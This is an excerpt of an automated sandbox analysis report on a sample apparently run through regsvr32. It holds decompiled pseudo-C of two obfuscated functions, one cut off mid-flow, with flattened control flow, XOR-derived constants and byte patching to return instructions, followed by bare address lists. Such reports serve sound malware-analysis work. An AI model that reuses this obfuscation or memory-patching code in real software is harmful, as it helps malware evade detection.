P_W, xrefs: 04B35D6B
NI5, xrefs: 04B35FC8
tJP, xrefs: 04B35E3C
5 , xrefs: 04B35D12
2G, xrefs: 04B35905
{4, xrefs: 04B35CFA
W, xrefs: 04B35BC0
`, xrefs: 04B3621F
W"j, xrefs: 04B36006
Jm, xrefs: 04B35EFF

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: 8c4cee183eeaabf1771574d6943661b57d442a890d81dd486c144ff5ecba63f2
Instruction ID: 80f41e18627192443803a4ea49955ea1b59ab528be3aa3ef8e38224b7c423afd
Opcode Fuzzy Hash: 8c4cee183eeaabf1771574d6943661b57d442a890d81dd486c144ff5ecba63f2
Instruction Fuzzy Hash: F172ED715083809FD7B9CF65C98AB8BBBE1BBC4308F108A1DE2D986260D7B19559DF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B45779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B45779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								L04B52B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E04B357B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E04B35026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E04B4C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E04B371B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E04B4CCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E04B3C5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(L04B3FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							L04B52B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E04B4CCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E04B3E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x04b45780
0x04b4578a
0x04b4578b
0x04b45792
0x04b45794
0x04b45796
0x04b4579d
0x04b457a4
0x04b457a5
0x04b457a6
0x04b457ab
0x04b457bf
0x04b457c7
0x04b457c8
0x04b457cd
0x04b457d2
0x04b457d5
0x04b457d6
0x04b457de
0x04b457e7
0x04b457ec
0x04b457f7
0x04b457fb
0x04b457ff
0x04b4580a
0x04b45815
0x04b45820
0x04b4582b
0x04b45833
0x04b4583b
0x04b45843
0x04b4584b
0x04b45853
0x04b4585b
0x04b45864
0x04b45867
0x04b4586b
0x04b45870
0x04b45878
0x04b4588b
0x04b45892
0x04b4589d
0x04b458a8
0x04b458b0
0x04b458b7
0x04b458c2
0x04b458ca
0x04b458d2
0x04b458da
0x04b458e2
0x04b458ea
0x04b458ef
0x04b458f4
0x04b458fc
0x04b45904
0x04b4590c
0x04b45916
0x04b4591a
0x04b45922
0x04b4592a
0x04b45932
0x04b4593a
0x04b45942
0x04b45955
0x04b4595e
0x04b45969
0x04b45974
0x04b4597f
0x04b4598a
0x04b45992
0x04b4599a
0x04b459a2
0x04b459aa
0x04b459b2
0x04b459ba
0x04b459c2
0x04b459c7
0x04b459cf
0x04b459d7
0x04b459df
0x04b459e7
0x04b459ef
0x04b459f7
0x04b459fc
0x04b45a0a
0x04b45a0f
0x04b45a15
0x04b45a1d
0x04b45a25
0x04b45a2a
0x04b45a32
0x04b45a3a
0x04b45a42
0x04b45a4d
0x04b45a55
0x04b45a60
0x04b45a6b
0x04b45a73
0x04b45a7e
0x04b45a8a
0x04b45a8f
0x04b45a95
0x04b45a99
0x04b45aa1
0x04b45aad
0x04b45ab2
0x04b45ab8
0x04b45abd
0x04b45ac5
0x04b45ad0
0x04b45adb
0x04b45ae6
0x04b45aee
0x04b45af3
0x04b45af8
0x04b45b00
0x04b45b0c
0x04b45b11
0x04b45b15
0x04b45b1a
0x04b45b22
0x04b45b2a
0x04b45b32
0x04b45b37
0x04b45b41
0x04b45b4d
0x04b45b52
0x04b45b5d
0x04b45b60
0x04b45b64
0x04b45b6c
0x04b45b74
0x04b45b7c
0x04b45b84
0x04b45b8c
0x04b45b94
0x04b45b9c
0x04b45ba1
0x04b45baf
0x04b45bb3
0x04b45bbb
0x04b45bc3
0x04b45bcb
0x04b45bd3
0x04b45bdb
0x04b45be6
0x04b45bee
0x04b45bf9
0x04b45c01
0x04b45c09
0x04b45c0e
0x04b45c16
0x04b45c1e
0x04b45c29
0x04b45c34
0x04b45c3c
0x04b45c47
0x04b45c52
0x04b45c5d
0x04b45c68
0x04b45c73
0x04b45c7b
0x04b45c86
0x04b45c8e
0x04b45c93
0x04b45c98
0x04b45ca0
0x04b45cb3
0x04b45cba
0x04b45cc5
0x04b45ccd
0x04b45cdd
0x04b45ce5
0x04b45cf0
0x04b45cfb
0x04b45d06
0x04b45d0e
0x04b45d1b
0x04b45d1f
0x04b45d27
0x04b45d2f
0x04b45d42
0x04b45d49
0x04b45d54
0x04b45d5f
0x04b45d67
0x04b45d6f
0x04b45d74
0x04b45d7c
0x04b45d84
0x04b45d8c
0x04b45d94
0x04b45da2
0x04b45da5
0x04b45da9
0x04b45db1
0x04b45db1
0x04b45db1
0x04b45db1
0x04b45db8
0x04b45db8
0x04b45db8
0x04b45db8
0x04b45dbe
0x00000000
0x00000000
0x04b45dc4
0x04b45f56
0x04b45f5d
0x00000000
0x04b45f5d
0x04b45dd0
0x04b45f26
0x04b45f2b
0x04b45f30
0x04b460a6
0x04b460b7
0x04b460b7
0x04b45f36
0x00000000
0x04b45f36
0x04b45ddc
0x04b45e43
0x04b45e59
0x04b45e65
0x04b45e86
0x04b45e8b
0x04b45e92
0x04b45e99
0x04b45e9b
0x04b45ea3
0x04b45ea4
0x04b45ea9
0x04b45eab
0x04b45eae
0x04b45eb2
0x04b45ec7
0x04b45ee0
0x04b45ee1
0x04b45ee6
0x04b45eeb
0x04b45eee
0x04b45ef3
0x04b45ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x04b45eb4
0x04b45eb4
0x04b45eb4
0x04b45ebd
0x04b45ebf
0x04b45ebf
0x04b45ec2
0x04b45ec3
0x00000000
0x04b45eb4
0x04b45de4
0x04b45e35
0x00000000
0x04b45e35
0x04b45dec
0x00000000
0x00000000
0x04b45e08
0x04b45e09
0x04b45e0d
0x04b45e12
0x04b45e15
0x04b45e1a
0x04b45e2e
0x04b45e1c
0x04b45e1c
0x04b45e27
0x04b45e27
0x04b45e1a
0x04b45f6d
0x04b46067
0x04b46073
0x00000000
0x04b46073
0x04b46069
0x00000000
0x04b46069
0x04b45f79
0x04b4609f
0x00000000
0x04b460a5
0x04b45f85
0x04b4600c
0x04b4600d
0x04b4601b
0x04b4601d
0x04b46024
0x04b4602b
0x04b46039
0x00000000
0x04b46039
0x04b45f8d
0x00000000
0x00000000
0x04b45fa6
0x04b45faf
0x04b45fb9
0x04b45fcf
0x04b45fd7
0x04b45fe2
0x04b45fe7
0x04b45fec
0x00000000
0x00000000
0x04b45ff2
0x00000000
0x04b46078
0x04b46078
0x00000000
0x04b46084

Strings

w=_, xrefs: 04B458F4
_jvP, xrefs: 04B45D74
=G, xrefs: 04B45CC5
xdX, xrefs: 04B45904
~*, xrefs: 04B45A2A
pk, xrefs: 04B458A8
, xrefs: 04B45FD7
Uh G, xrefs: 04B45D54
01, xrefs: 04B45D84
Ikz, xrefs: 04B45922

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: bdedcfb1691eb3416ce6391fd2c096ee83f036e4721e13c9f8303c2cdc14b176
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction Fuzzy Hash: 792222711093809FD368CF25C58AA9BBBE2FFC5708F10891DE6D996260D7B19948DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B47D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B47D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E04B31A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E04B52D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x4b3196c,  &_v520,  &_v1040, E04B4E1F8(0x4b3196c, _v2768, __eflags));
						E04B4FECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E04B485FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E04B50DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
